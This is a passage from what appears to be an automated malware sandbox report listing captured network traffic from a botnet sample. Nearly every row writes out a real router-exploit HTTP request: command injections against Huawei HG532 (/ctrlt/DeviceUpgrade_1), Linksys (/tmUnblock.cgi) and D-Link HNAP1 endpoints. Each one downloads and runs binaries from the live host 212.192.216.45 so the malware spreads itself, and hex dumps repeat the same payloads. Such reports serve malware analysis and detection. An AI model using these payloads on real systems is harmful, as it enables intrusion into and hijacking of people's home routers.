xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 